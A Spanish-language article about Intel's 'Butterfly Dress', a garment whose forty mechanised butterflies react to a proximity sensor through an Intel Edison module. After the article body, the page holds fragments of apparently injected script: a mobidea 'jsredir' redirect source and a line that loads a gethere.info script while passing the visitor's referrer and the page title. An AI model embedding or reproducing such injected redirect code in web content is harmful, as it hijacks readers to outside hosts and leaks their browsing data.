Metamorfosis de la moda, Intel presenta: Butterfly Dress

Unas de las temporadas más esperadas por todos los fashionistas definitivamente son las semanas de moda que hay en cada una de las principales ciudades del mundo. Durante siete días los diseñadores más destacados invaden las pasarelas mostrando el desarrollo de innovadores outfits que marcarán tendencia en los siguientes meses.

Una de las tendencias más aplaudidas en las últimas muestras de moda, sin duda es la utilización de la tecnología en prendas de vestir. Sin embargo, cuando pensamos en esto quizá visualicemos aparatos potentes y experimentales que también se encuadran en esta categoría: anillos inteligentes con Bluetooth y colgantes de seguimiento de actividad, gafas del estilo Google Glass y auriculares que monitorizan la frecuencia cardíaca.

Con lo anterior como un principio, y la creatividad a flor de piel, varios diseñadores han comenzado a incorporar tecnología en ropa ‘inteligente’ no solo para darle elementos funcionales, sino para exhaltar y embellecer sus creaciones logrado de manera exitosa la elaboración de prendas de vestir hechas con elementos de cómputo que les brindan a sus creaciones autonomía para iluminarse o tener movimiento programado.

Ejemplo de lo anterior, es el Butterfly Dress inspirado por Intel y creado por las diseñadoras Ezra y Tuba Çetin en conjunto con Cagri Tanriover, Ingeniero de desarrollo de software en Istanbul en Intel Labs Europa.

El vestido, confeccionado con un lujoso entretejido jacquard con fibras metálicas de lúrex, está adornado con unas cuarenta mariposas. Además, está equipado con un sensor de proximidad que permite a las mariposas reaccionar a estímulos externos.

Las mariposas aletean lentamente al principio, pero después incrementan la intensidad paulatinamente mientas una persona se acerca. Por último, las mariposas pueden salir en masa en un espectacular despegue ocasionado por la persona que se acerca o por un dispositivo móvil que se comunica con el vestido mediante una red inalámbrica. Lo anterior es posible gracias al módulo de cómputo Intel Edison que es básicamente una pequeña computadora -del tamaño de una caja de cerillos- que no cuenta con todos los periféricos como el teclado, la pantalla, etcétera.

De esta manera, el Butterfly Dress encaja con la incipiente tendencia de tecnología para llevar puesta la moda mecanizada. El espectacular vestido sólo es una prueba de que el futuro está más cercano de lo que parece. La ropa inteligente dejó de ser ficción para convertirse en una realidad.

Las diseñadoras Ezra y Tuba han asegurado que fusionar la moda y la tecnología no es una actividad pasajera. Los proyectos futuros incluyen utilizar la energía cinética para generar electricidad con el movimiento de la persona, crear tejidos que cambian de color y estampado y utilizar el modelado y la impresión en 3D para confeccionar moda personalizada. Así es como Intel está trabajando en conjunto con diferentes creadores para realizar productos sorprendentes que sin duda alguna marcan la pauta de un antes y un después en las diferentes industrias donde se tiene injerencia.

< src="http://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|||
Comentarios